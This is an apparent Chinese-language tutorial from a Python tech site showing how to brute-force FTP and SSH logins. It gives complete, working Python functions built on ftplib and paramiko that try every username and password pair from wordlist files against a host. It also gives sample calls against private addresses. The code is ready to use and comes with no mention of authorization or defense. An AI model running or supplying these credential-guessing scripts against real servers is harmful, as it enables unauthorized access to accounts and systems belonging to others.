Python中FTP服务与SSH登录暴力破解的实现

Python中FTP服务暴力破解的实现

首先，我们需要使用Python中的ftplib库来连接FTP服务器。具体实现方法如下：

import ftplib

def ftp_login(host, username, password):
    try:
        ftp = ftplib.FTP(host)
        ftp.login(username, password)
        ftp.quit()
        return True
    except:
        return False

以上代码通过封装了一个函数ftp_login，实现了FTP服务器的登录验证。

接下来，我们可以通过一个循环来进行暴力破解：

def ftp_bruteforce(host, usernames_file, passwords_file):
    with open(usernames_file) as uf:
        usernames = uf.readlines()
    with open(passwords_file) as pf:
        passwords = pf.readlines()

    for username in usernames:
        username = username.strip()
        for password in passwords:
            password = password.strip()
            if ftp_login(host, username, password):
                print("Login succeeded: username={}, password={}".format(username, password))
                return True

    print("Login failed.")
    return False

以上代码通过打开用户名和密码的文件，分别读取行并去除空格和换行符，然后使用ftp_login函数循环尝试每一组用户名密码的登录，如果登录成功，则打印出登录成功的信息。

示例说明：

已知FTP服务器的地址为192.168.1.102，且开放了21端口，用户名和密码列表分别保存在usernames.txt和passwords.txt中，我们可以使用以下代码来进行暴力破解：

ftp_bruteforce("192.168.1.102", "usernames.txt", "passwords.txt")

Python中SSH登录暴力破解的实现

SSH登录过程中需要使用到paramiko库，具体的实现步骤如下：

import paramiko

def ssh_login(host, username, password):
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host, port=22, username=username, password=password, timeout=5)
        ssh.close()
        return True
    except:
        return False

以上代码封装了一个函数ssh_login，使用paramiko库连接SSH服务器，如果连接成功则返回True，否则返回False。

暴力破解过程与FTP服务相似，我们同样需要使用循环来遍历用户名密码列表，具体实现如下：

def ssh_bruteforce(host, usernames_file, passwords_file):
    with open(usernames_file) as uf:
        usernames = uf.readlines()
    with open(passwords_file) as pf:
        passwords = pf.readlines()

    for username in usernames:
        username = username.strip()
        for password in passwords:
            password = password.strip()
            if ssh_login(host, username, password):
                print("Login succeeded: username={}, password={}".format(username, password))
                return True

    print("Login failed.")
    return False

以上代码与FTP服务中的暴力破解实现非常相似，只是使用了ssh_login函数来替代了ftp_login函数。同样的，我们可以使用上述代码来连接SSH服务器并进行暴力破解。

示例说明：

已知SSH服务地址为192.168.1.103，且开放了22端口，用户名和密码列表同样保存在usernames.txt和passwords.txt中，使用以下代码来进行暴力破解：

ssh_bruteforce("192.168.1.103", "usernames.txt", "passwords.txt")

本站文章如无特殊说明，均为本站原创，如若转载，请注明出处：Python中FTP服务与SSH登录暴力破解的实现 - Python技术站

Python中FTP服务与SSH登录暴力破解的实现

相关文章